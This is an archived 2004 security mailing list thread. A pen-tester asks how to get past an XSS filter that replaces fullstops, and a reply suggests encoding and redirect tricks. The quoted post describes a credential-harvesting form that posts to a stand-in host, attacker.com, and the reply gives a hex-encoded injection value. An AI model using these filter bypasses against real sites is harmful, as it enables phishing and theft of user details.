WebApp Sec mailing list archives

RE: Fullstop Substitution in XSS

From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000

Well,
        In the old days, an ip (127.0.0.1) used to be able to be replaced
        for the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1), perhaps
        check if that still works (althought I seem to remember it doesn't).
        
        Other than that (and possible dns infiltration) consider sites that,
        upon invalid domain (http://yahoo?test@hello) redirect to somewhere
        else ... even some search sites ... i.e. perhaps you could execute a
        search which your malicious site (attacker.com) would make note of.

        Or ... you say you tried hex encoding ... i.e. this ?

        if result is:
        <form target="INPUT GOES HERE">

        INPUT GOES HERE could be ...

        -------------------------------------
        http://www%2egoogle%2ecom
        -------------------------------------

        If the % get's translated at the time of sending to the site, hex-encode
        that because the above is *exactly* what should appear in the source of
        the form tag, not the decoded result.
-- Michael


-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, 29 May 2004 2:49 PM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS


Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net


This email message and accompanying data may contain information that is confidential and/or subject to legal 
privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying 
of this message or data is prohibited. If you have received this email message in error, please notify us immediately 
and erase all copies of this message and attachments.

This email is for your convenience only, you should not rely on any information contained herein for contractual or 
legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by 
authorised persons.

Current thread:

Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
  - Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)